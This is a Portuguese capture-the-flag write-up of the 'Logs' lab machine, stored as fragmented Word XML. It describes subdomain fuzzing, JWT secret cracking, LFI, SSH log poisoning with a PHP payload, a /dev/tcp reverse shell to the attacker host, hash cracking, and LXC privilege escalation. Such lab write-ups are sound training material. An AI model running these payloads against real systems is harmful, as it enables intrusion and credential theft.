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nkb5yrru3bc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ezbudwebx03k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Logs.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jyho8mcotuj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Iniciamos a enumeração da máquina utilizando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o objetivo de identificar as portas expostas e os serviços acessíveis na aplicação.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05000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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identificadas duas portas abertas,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80/HTTP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Ao acessar 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observamos um redirecionamento para o virtual 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logs.hc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sendo necessária a adição desse host no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permitir a resolução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local.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84663"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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6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logs.hc"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695950" cy="714375"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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7143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logs.hc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visualizar a aplicação web exposta pelo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HTTP.</w:t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74900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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subdomínios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o subdomínio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staging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http://logs.hc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FUZZ.logs.hc"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shubs-subdomains.txt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06700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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esse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subdomínio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identificada outra aplicação web exposta.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35300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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subdomínio, foi possível realizar o registro na aplicação web, resultando na criação de um usuário.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91749"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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22963"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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9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o registro na aplicação, fomos redirecionados para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90800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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rota principal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identificado um botão que direciona para a documentação da aplicação.</w:t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86100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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essa aplicação, foi identificado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Swagger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exposto, listando todas as rotas disponíveis da aplicação.</w:t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73300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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Swagger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exposto, foi possível identificar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/api/view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acessível apenas com privilégios de administrador.</w:t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66800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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as aplicações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staging e produção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utilizavam o mesmo banco de dados, foi possível autenticar na produção utilizando as mesmas credenciais criadas no ambiente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staging.</w:t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721100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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autenticar na aplicação web, fomos redirecionados novamente para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e, desta vez, recebemos o token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 da sessão.</w:t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57500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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tentamos quebrar o token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JWT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Hashcat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objetivo de recuperar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secret_key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permitir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reassinatura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~/rockyou.txt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39900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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secret_key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era fraca, foi possível quebrar o token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via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brute force.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92839853879156166491915372959629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secret_key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já obtida, foi possível reassinar o token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JWT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privilégios elevados, atribuindo permissões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aplicação.</w:t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16400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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acessar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/api/view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previamente identificada na aplicação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staging.</w:t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'http://logs.hc/api/view'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&lt;your-token&gt;"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46100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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rota, a aplicação retorna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{"error":"File not found"}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a necessidade de informar um arquivo como parâmetro.</w:t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adicionar o parâmetro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o valor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fornecido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passou a ser incluído diretamente pela aplicação, resultando em uma vulnerabilidade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LFI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LFI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permitiu a leitura do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sistema.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'http://logs.hc/api/view?file=/etc/passwd'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&lt;your-token&gt;”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572000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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foi possível ler o arquivo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logs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/var/log/auth.log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exploramos a técnica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 poisoning,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consiste em injetar payloads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maliciosos durante tentativas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autenticação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Como o LFI também interpretava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é possível executar comandos diretamente na máquina.</w:t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'http://logs.hc/api/view?file=/var/log/auth.log'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&lt;your-token&gt;”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9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Exploramos log poisoning injetando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campo de username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utilizando a função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Versões mais recentes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restringem o uso de caracteres especiais no username, impedindo a injeção direta.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system("id");?&gt;'@logs.hc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09600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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Executamos o arquivo python.</w:t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paramiko.SSHClient()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ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())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ssh.connect(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hostname='logs.hc',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port=22,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username='&lt;?php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system("id");?&gt;',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password='teste'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stdout,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stderr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ssh.exec_command('ls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print(stdout.read().decode())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49400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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Lemos novamente o arquivo de log para validar a execução do payload.</w:t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interpretado e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output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pôde ser observado nos logs da máquina.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'http://logs.hc/api/view?file=/var/log/auth.log'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&lt;your-token&gt;”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82700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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possibilidade de execução de comandos no sistema, foi possível executar uma reverse shell.</w:t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Criamos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index.html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contendo a payload de reverse shell para ser executada pelo servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000096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/dev/tcp/&lt;machine-ip&gt;/443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19200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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exploit, alteramos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incluir um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responsável por baixar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do nosso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IP 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salvá-la como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index.html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máquina alvo. Em seguida, executamos novamente o exploit para realizar o log poisoning.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&lt;machine-ip&gt;");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7000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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Lemos novamente o arquivo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logs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executar o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7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Recebemos as requisições do servidor, confirmando que o arquivo foi baixado para a máquina alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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55700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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já presente, executamos novamente o script de log poisoning para acionar a reverse shell e, em seguida, lemos o arquivo de log para disparar a execução do payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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&lt;?php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system("bash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index.html");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24550" cy="2952750"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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9527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7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Recebemos a reverse shell com sucesso, confirmando a execução remota de código na máquina alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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638800" cy="1990725"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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907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lxqrb9bk3nu9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Obtivemos uma shell TTY interativa na máquina alvo.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pty;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pty.spawn('/bin/bash')"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38300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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/var/www/shared,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identificamos o arquivo de banco de dados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database.sqlite.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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9900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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abrir o banco de dados, identificamos a tabela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users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continha a hash de senha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developer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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sqlite3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database.sqlite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43000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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hash da senha do usuário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developer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quebrada utilizando o Hashcat.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~/rockyou.txt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developer:superman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25400" l="25400" r="25400" t="2540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autenticar na máquina utilizando a conta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developer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5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usuário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/home/developer/.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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65200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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mp8vniszp1ju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id,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identificamos que o usuário pertencia ao grupo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lxc.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lxc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é uma tecnologia de contêineres Linux. Usuários no grupo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podem gerenciar contêineres e, em ambientes mal configurados, isso pode permitir escalonamento de privilégios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22300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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utilizar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lxc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primeiro precisamos baixar uma imagem de contêiner. Utilizamos esta imagem: </w:t>
      </w:r>
      <w:hyperlink r:id="rId4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imagem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Como a máquina alvo não possuía acesso à internet, a imagem do contêiner foi baixada localmente e posteriormente transferida para a máquina alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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08100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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&lt;vpn-ip&gt;/alpine-v3.13-x86_64-20210218_0139.tar.gz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55700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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Importamos a imagem para o LXC, tornando-a disponível para criação e execução do contêiner.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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alpine-v3.13-x86_64-20210218_0139.tar.gz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--alias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27100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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 criamos um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contêiner privilegiado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 montar diretórios e partições do sistema. Montamos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/mnt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tornando-o acessível de dentro do contêiner.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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security.privileged=true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mydevice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source=/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path=/mnt/root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recursive=true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31900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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 todo o diretório do sistema está disponível em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/mnt/root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incluindo a pasta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root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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60800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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flag do usuário root se encontra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/mnt/root/root.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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13000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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headerReference r:id="rId50" w:type="default"/>
      <w:headerReference r:id="rId51" w:type="first"/>
      <w:headerReference r:id="rId52" w:type="even"/>
      <w:footerReference r:id="rId53" w:type="default"/>
      <w:footerReference r:id="rId54" w:type="first"/>
      <w:footerReference r:id="rId5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F">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.60idcrtbhsof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84" name="image28.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image28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0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6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91" name="image42.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image4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5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Logs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53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6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3.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/saghul/lxd-alpine-builder/blob/master/alpine-v3.13-x86_64-20210218_0139.tar.gz" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17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48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6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4.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35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8.jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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2.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4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mw2R9K38RnhVHlEOLFTY7++wYw==">CgMxLjAyDmgubmtiNXlycnUzYmNyMg5oLmV6YnVkd2VieDAzazIOaC5qeWhvOG1jb3R1anAyDmgubHhxcmI5YmszbnU5Mg5oLm1wOHZuaXN6cDFqdTIOaC42MGlkY3J0Ymhzb2Y4AHIhMUJ6VmRSdlB0VG8teG4zNHhmWTloRUQxZW1jSDRQRVNB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